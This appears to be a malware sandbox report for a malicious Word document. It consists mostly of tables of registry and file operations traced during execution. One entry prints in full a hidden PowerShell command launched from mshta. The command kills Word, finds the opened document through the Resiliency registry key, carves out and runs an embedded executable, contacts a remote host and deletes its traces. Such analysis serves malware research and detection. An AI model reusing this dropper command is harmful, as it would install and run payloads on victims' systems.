| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
|
For performance reasons, the remaining 1009 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe" -WindowStyle Hidden Try{$ada="""$env:APPDATA\result.exe""";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf="""$env:TEMP\o.tmp""";taskkill /f /im winword.exe;Function pr{Try{$k="""HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\""";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path """HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency""" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword """$r""";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\).Path;ri """$cd\*""" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;} |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:08, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:28 |
| Information | Value |
|---|---|
| PID | 0x968 |
| Parent PID | 0x370 (c:\windows\system32\mshta.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
428
0x
9A4
0x
994
0x
458
0x
A60
0x
B4
0x
9CC
0x
92C
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\mobsync.exe, file_name_orig = C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Get Info | filename = C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
10 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096 |
|
41 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Get Info | type = file_type |
|
1 | |
| File | Read | size = 4096, size_out = 4096 |
|
6 | |
| File | Read | size = 4096, size_out = 2530 |
|
1 | |
| File | Read | size = 542, size_out = 0 |
|
1 | |
| File | Read | size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 2762 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 310, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
17 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 3022 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 50, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 281 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
38 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
